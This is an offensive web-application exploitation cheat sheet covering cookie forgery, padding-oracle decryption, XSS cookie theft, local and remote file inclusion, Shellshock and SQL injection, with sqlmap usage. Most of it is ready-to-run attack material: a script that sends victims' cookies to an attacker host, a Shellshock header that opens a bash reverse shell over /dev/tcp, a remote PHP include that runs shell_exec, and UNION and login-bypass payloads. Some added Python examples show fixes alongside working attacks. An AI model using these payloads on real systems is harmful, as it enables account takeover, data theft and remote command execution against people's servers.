There are many different ways a web application can be exploited. This page lists a few simple examples, resources and tools.

Browser add-ons:

Command-line tools:

  • curl
  • wget


Bot Spoofing

Spoofing the Googlebot User-Agent when fetching robots.txt (some sites serve different content, or skip access controls, for crawlers):

curl -A "Googlebot/2.1 (+http://www.google.com/bot.html)" http://<host>/robots.txt

Authentication Spoofing

Simple Cookies

Some older websites may have weak authentication cookies, for example a plain conversion of:

user:admin

encoded with base64, which results in a valid request header of:

auth: dXNlcjphZG1pbgo=

To create the encoded string:

echo 'user:admin' | base64 -

The newline that echo appends is part of the encoded value (it decodes to "user:admin" followed by a newline); use printf 'user:admin' | base64 to encode without it.

To decode the string:

echo 'dXNlcjphZG1pbgo=' | base64 -d -
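As an added example that is not from the original page: the weak scheme above, where the cookie is nothing more than base64("user:role"), next to a minimal hardened form that appends an HMAC tag computed under a server-side secret. The secret value, the role names and the "payload.tag" layout are assumptions made for this illustration.

```python
import base64
import hashlib
import hmac

# --- Weak scheme from the notes above: the "auth" value is just base64("user:role") ---

def decode_weak_cookie(value):
    """Decode base64('user:role'). A trailing newline (left by `echo`) is ignored."""
    raw = base64.b64decode(value).decode()
    user, role = raw.rstrip("\n").split(":", 1)
    return user, role

def forge_weak_cookie(user, role):
    """Anyone can mint a cookie for any user and role: no secret is involved."""
    return base64.b64encode(("%s:%s" % (user, role)).encode()).decode()

# --- Hardened form: same payload, plus an HMAC tag under a server-side secret ---
# The secret is an assumption for this example; in practice load it from configuration.
SECRET = b"server-side-secret-for-this-example"

def sign_cookie(user, role, secret=SECRET):
    """Return payload.tag so the server can detect any change to the payload."""
    payload = forge_weak_cookie(user, role)
    tag = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return "%s.%s" % (payload, tag)

def verify_cookie(value, secret=SECRET):
    """Return (user, role) only if the tag matches; None for forged or tampered cookies."""
    if "." not in value:
        return None
    payload, tag = value.rsplit(".", 1)
    expected = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        return None
    try:
        return decode_weak_cookie(payload)
    except (ValueError, UnicodeDecodeError):
        return None
```

With the weak scheme, forge_weak_cookie("bob", "admin") is accepted by any server that only base64-decodes; with the signed scheme the same value fails verify_cookie because no valid tag can be produced without the secret.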


Some websites may be vulnerable to padding oracle attacks on CBC-encrypted cookies or tokens: if the application responds differently when decryption hits invalid padding, the ciphertext can be decrypted (and forged) without the key. Kali ships PadBuster, which automates the attack:

padbuster <url> <encrypted_sample> <block_size> [options]
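The attack that PadBuster automates, as an added example that is not from the original page: a padding oracle decrypts CBC ciphertext one byte at a time using nothing but the server's "valid padding / invalid padding" answer. The cipher here is a constructed 4-round Feistel stand-in (not AES and not secure; the attack does not depend on the cipher's strength), the block size, key and plaintext are assumptions, and padding_oracle plays the part of the vulnerable server.

```python
import hashlib
import os

BLOCK = 8             # block size in bytes (assumption for the toy cipher; AES uses 16)
KEY = os.urandom(16)  # the server's key; the attacker never learns it

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):
    # Round function of the toy cipher: a keyed hash truncated to half a block.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]

def block_encrypt(key, block):
    """Constructed 4-round Feistel cipher: a stand-in block cipher, not a secure one."""
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r

def block_decrypt(key, block):
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r

def pad(data):
    n = BLOCK - len(data) % BLOCK           # PKCS#7: always add 1..BLOCK bytes
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, plaintext):
    iv = os.urandom(BLOCK)
    out, prev = [iv], iv
    data = pad(plaintext)
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)                     # IV || C1 || C2 ...

def cbc_decrypt(key, ciphertext):
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(_xor(block_decrypt(key, cur), prev)
                     for prev, cur in zip(blocks, blocks[1:]))
    return unpad(plain)

def padding_oracle(ciphertext):
    """What a vulnerable server leaks: did decryption fail on the padding check?"""
    try:
        cbc_decrypt(KEY, ciphertext)
        return True
    except ValueError:
        return False

def padding_oracle_decrypt(ciphertext, oracle):
    """Recover the plaintext using only the oracle (this is the loop PadBuster runs)."""
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    recovered = b""
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)             # block_decrypt(KEY, cur), learned byte by byte
        for pos in range(BLOCK - 1, -1, -1):
            padval = BLOCK - pos             # padding value we try to produce at this position
            for guess in range(256):
                forged = bytearray(BLOCK)
                forged[pos] = guess
                for j in range(pos + 1, BLOCK):
                    forged[j] = inter[j] ^ padval   # force already-known bytes to padval
                if not oracle(bytes(forged) + cur):
                    continue
                if pos == BLOCK - 1:
                    # Rule out an accidental longer padding such as ...02 02:
                    # changing the byte before it must not break a genuine 01.
                    forged[pos - 1] ^= 0xFF
                    if not oracle(bytes(forged) + cur):
                        continue
                inter[pos] = guess ^ padval
                break
        recovered += _xor(bytes(inter), prev)
    return unpad(recovered)
```

Each byte costs at most 256 oracle queries, so a real token of a few blocks takes a few thousand requests; the same intermediate values let an attacker encrypt a chosen plaintext as well. The fix on the server side is to authenticate the ciphertext (an HMAC over it, or an AEAD mode) and to reject it before any padding is inspected.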






Cross-Site Scripting (XSS)

Create a listener on the attacking machine to catch the victim browser's callback:

nc -lvp <port>

Reverse Connection

<iframe src="http://<attackeripaddress>:<port>/madeup.php" height="0" width="0"></iframe>

Cookie Stealer

<script>new Image().src="http://<attackeripaddress>:<port>/madeup.php?output="+document.cookie;</script>

The victim's cookies arrive in the listener's output as the query string of the request. They can then be replayed by setting them in a browser cookie plugin or by editing the Cookie header in Burp Proxy. Cookies flagged HttpOnly are not readable from document.cookie and will not be captured this way.





Local File Inclusion


Server Side Code, without validation:

$file = $_GET['file'];
if (isset($file)) {
    include($file);
}


Client side request:

http://<host>/<page>?file=myfile.txt

This request includes the local file myfile.txt.

http://<host>/<page>?file=/etc/passwd

Because the parameter goes straight into include(), an absolute path such as this one exposes a file outside the web root; if the included file contains PHP it is executed rather than displayed.

Filter Avoidance

Some code tries to filter out characters or sequences such as / . \ ' " before using the input. A filter that strips a sequence only once can usually be beaten by nesting it (for example ....// becomes ../ after one pass); only resolving the path and checking that it stays inside the intended directory is reliable.
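As an added example that is not from the original page (the page's own code is PHP; the same defect is reproduced here in Python so it can be run offline): the unvalidated include, a naive "strip ../" blacklist that is bypassed with ....//, and a hardened version that allowlists the name and checks the resolved path against the web root. The temporary web root, the file names and the "outside.txt" stand-in for /etc/passwd are constructed for the example.

```python
import os
import re
import tempfile

# Constructed sandbox standing in for the web root and one file outside it
# (assumptions for this example; think of outside.txt as /etc/passwd).
BASE = tempfile.mkdtemp()
WEBROOT = os.path.join(BASE, "www")
OUTSIDE = os.path.join(BASE, "outside.txt")
os.makedirs(WEBROOT)
with open(os.path.join(WEBROOT, "myfile.txt"), "w") as fh:
    fh.write("hello from the web root\n")
with open(OUTSIDE, "w") as fh:
    fh.write("root:x:0:0:root:/root:/bin/bash\n")

def include_unvalidated(name):
    """Mirrors include($_GET['file']): whatever path the process can read is returned.
    os.path.join discards WEBROOT when `name` is absolute, just as include() would."""
    with open(os.path.join(WEBROOT, name)) as fh:
        return fh.read()

def include_naive_filter(name):
    """A blacklist that strips '../' once. '....//' survives it as '../'."""
    return include_unvalidated(name.replace("../", ""))

def include_safe(name):
    """Allowlist the characters, then confirm the resolved path stays inside WEBROOT."""
    if not re.fullmatch(r"[A-Za-z0-9_.-]+", name):
        raise PermissionError("rejected file name: %r" % name)
    root = os.path.realpath(WEBROOT)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, target]) != root:   # catches ".." and symlinks out
        raise PermissionError("path escapes the web root: %r" % name)
    with open(target) as fh:
        return fh.read()

def is_blocked(name):
    """True when include_safe refuses `name`."""
    try:
        include_safe(name)
    except PermissionError:
        return True
    return False
```

The allowlist alone is not enough: ".." passes the character check, which is why the realpath containment test is kept as the second line of defence.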


Directory Traversal


Remote Code Execution

Server Side Code, without validation:

$page = $_GET['page'];
if (isset($page)) {
    include($page . '.php');
}


Client side request:

http://<host>/<page>?page=mypage

This request includes the local relative file mypage.php (the script appends the .php extension itself).


On the attacking machine start a web server (on Python 3 the equivalent is python3 -m http.server <port>):

python -m SimpleHTTPServer <port>

Create a malicious php page (the command output has to be echoed, otherwise nothing comes back):

echo '<?php echo shell_exec("ifconfig"); ?>' > evil.txt

Make the request:

http://<host>/<page>?page=http://<attackeripaddress>:<port>/evil.txt?

The trailing ? turns the appended ".php" into a query string, so the attacking web server still serves evil.txt; on PHP before 5.3.4 a %00 null byte achieved the same truncation. Remote inclusion only works when allow_url_include is enabled in php.ini, which is off by default in modern PHP; without it, the same code is still a local file inclusion.

Shellshock (CVE-2014-6271 and its follow-ups) is a bug in the bash shell: function definitions passed in through environment variables were parsed in a way that also executed whatever commands followed them, which gives Remote Code Execution. It is most commonly reachable through CGI scripts, where the web server copies request headers such as User-Agent into environment variables before running bash (directly, or through PHP calls such as system() that spawn a shell).


Test by seeing if an echoed test string comes back in the response:

curl -H "User-Agent: () { :;}; echo 'test';" http://<host>/<page>

Because the injected output is written before the script's own HTTP headers, a vulnerable CGI often answers with a 500 error instead of showing the string; a delay (for example /bin/sleep 10) or a connection back to a listener you control is a more reliable indicator.

If successful, then setup a listener shell on the attacking machine:

nc -lvp <port>

Then send the attack code:

curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/<attackingipaddress>/<port> 0>&1;" http://<host>/<page>





SQL/NoSQL Injection

There are many popular SQL dialects that differ in syntax, but the principles are the same:

  • MySQL
  • Oracle DB
  • Microsoft SQL
  • PostgreSQL
  • MongoDB (a NoSQL document store; the injection idea carries over, the syntax does not)

In-Band SQLi

The most common type, often considered the default type of SQL injection attack: the injection and the retrieved data travel over the same channel, the normal HTTP response. Error-based and union-based injection, described below, are both in-band techniques.

Authentication Bypass

Server Side Example Code, without validation:

$user = $_POST['user'];
$password = $_POST['password'];
$query = "select * from users where name = '$user' and password = '$password' ";
$result = mysql_query($query);
if (mysql_num_rows($result) == 1) {
    // load successful data/page
}

MySQL Example Table:

mysql> select * from users;
| id | name  | password |
| 1  | admin | 123456   |
1 row in set (0.00 sec)

Intended Results

On a login with username and password fields, a successful query would look something like this:

mysql> select * from users where name='admin' and password='123456';
| id   | name | password |
|  1  | admin | 123456   |
1 row in set (0.00 sec)

And a failed login query would result in no rows returned:

mysql> select * from users where name='admin' and password='1234';
Empty set (0.00 sec)


The query has to return exactly one row. That can be forced by injecting a condition that is always true, such as 1=1, and adding LIMIT 1 so that only one row comes back:

mysql> select * from users where name='admin' or 1=1 LIMIT 1;# and password='1234';

The application field could look like:

admin' or 1=1 LIMIT 1;#

The # starts a MySQL comment, so the password check that follows it is never evaluated.

Error Based SQLi

This type of attack can be used to help enumerate server information by receiving error codes from bad requests.

An application with a field could allow a simple test:

'; test

Which may result in an error message back:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1.
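The authentication bypass and the error-based probe above, as an added example that is not from the original page: the PHP login is reproduced in Python against an in-memory SQLite copy of the users table, next to the parameterised query that stops the attack. SQLite comments with "-- " where MySQL accepts "#", so the payload uses the form that works on both; the table contents and the password are the constructed values from the page's own table.

```python
import sqlite3

def make_db():
    """In-memory SQLite copy of the users table shown above (constructed test data)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table users (id integer, name text, password text)")
    db.execute("insert into users values (1, 'admin', '123456')")
    return db

def build_query(user, password):
    """Same string concatenation as the PHP above."""
    return "select * from users where name = '%s' and password = '%s'" % (user, password)

def login_vulnerable(db, user, password):
    """Logs in when exactly one row comes back (the mysql_num_rows == 1 check)."""
    rows = db.execute(build_query(user, password)).fetchall()
    return len(rows) == 1

def login_safe(db, user, password):
    """Parameterised query: the payload is compared as a literal name, never parsed as SQL."""
    rows = db.execute("select * from users where name = ? and password = ?",
                      (user, password)).fetchall()
    return len(rows) == 1

def probe_error(db, user):
    """Error-based probing: the raw database error text a careless page would echo back,
    or None when the input parses cleanly."""
    try:
        login_vulnerable(db, user, "x")
    except Exception as exc:   # sqlite3.Error, or ProgrammingError for a second statement
        return str(exc)
    return None

# "-- " (with the trailing space) is a comment in both MySQL and SQLite.
BYPASS = "admin' or 1=1 limit 1 -- "
```

build_query(BYPASS, "x") shows exactly what the database sees: the quote closes the name literal, 1=1 makes the WHERE clause true for every row, LIMIT 1 satisfies the single-row check, and the comment discards the password test. login_safe receives the same string and simply finds no user with that name.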

Union Based SQLi

This is often used after enumeration error based messages. A union in an SQL statement allows for two or more SELECT statements to be returned so long as they have the same data types, same order and rows. A union all will keep duplicate values.

SQL Code Example:

SELECT City FROM Customers
SELECT City FROM Vendors

Server Side Code Example:

$id = $_GET['id'];
$q = "SELECT * FROM $tbl_name where id = ".$id;

Client Request Example:

http://<host>/page.php?id=1

To find how many columns the original query returns, append ORDER BY with an increasing column number until the database errors (on MySQL: Unknown column '5' in 'order clause'):

http://<host>/page.php?id=1 order by 1

Say order by 5 errors but order by 4 does not: the query returns 4 columns, so a UNION must supply 4 as well.

http://<host>/page.php?id=1 union select 1,2,3,4

The numbers that show up in the rendered page reveal which columns are displayed; replace one of those with an expression to build the payload:

http://<host>/page.php?id=1 union all select 1,2,3,4
http://<host>/page.php?id=3 union select 1,2,version(),4
http://<host>/page.php?id=3 union select 1,2,@@version,4

Using an id that matches no row (for example id=-1) leaves only the injected row for the page to render.
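The column-count enumeration and the version-leaking UNION above, as an added example that is not from the original page: the unquoted numeric query from the PHP snippet is reproduced against an in-memory SQLite table, count_columns walks ORDER BY upwards until the database errors, and union_payload places sqlite_version() (the MySQL version()/@@version equivalent) in the displayed column. The table, its rows and the assumption that the page renders the third column are constructed for the example.

```python
import sqlite3

REAL_VERSION = sqlite3.sqlite_version   # what the injection should leak

def make_db():
    """In-memory SQLite table with four columns (constructed test data)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table page (id integer, title text, body text, author text)")
    db.executemany("insert into page values (?, ?, ?, ?)", [
        (1, "Home", "Welcome", "alice"),
        (2, "About", "Who we are", "bob"),
        (3, "Contact", "Mail us", "carol"),
    ])
    return db

def fetch_page(db, id_param):
    """Mirrors $q = "SELECT * FROM $tbl_name where id = ".$id; (no quotes, no validation)."""
    return db.execute("SELECT * FROM page where id = " + id_param).fetchall()

def count_columns(db, max_cols=32):
    """Raise the ORDER BY column number until the database errors;
    the last value that worked is the number of columns in the query."""
    for n in range(1, max_cols + 1):
        try:
            fetch_page(db, "1 order by %d" % n)
        except sqlite3.OperationalError:
            return n - 1
    return max_cols

def union_payload(ncols, expression, slot):
    """id=-1 matches no real row, so the UNIONed row is the one the page renders.
    `slot` is the 0-based column the page visibly displays (assumed here to be 2)."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[slot] = expression
    return "-1 union select " + ",".join(cols)

def leak_version(db):
    """Equivalent of ...?id=-1 union select 1,2,version(),4 on MySQL."""
    n = count_columns(db)
    rows = fetch_page(db, union_payload(n, "sqlite_version()", 2))
    return rows[0][2]
```

Once the column count and the displayed slot are known, the same payload shape leaks anything the database user can read: swap the expression for a table or column name from the information schema, or for group_concat over a sensitive table.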




Automated Scripts


Crawl a page:

sqlmap -u http://<host> --crawl=1

If injection is found:

sqlmap -u "http://<host>/page.php?id=738" --dbms=mysql --dump


Download NoSQLMap:

git clone

Go into the directory and install the prerequisites:

cd NoSQLMap/
pip install couchdb pbkdf2 ipcalc 



All Methods

Using OWASP ZAP, once the proxy has been set up and the application has been spidered or scanned, switch to ATTACK mode (or run an Active Scan against the site). Findings end up in the Alerts tab together with the payloads and requests that triggered them.

Exposed Paths

Look for directories and files such as:

  • /robots.txt
  • /admin, /admin.php, etc.
  • /login, /login.php, etc.
  • /
  • /test/, /test.php, etc.
  • /uploads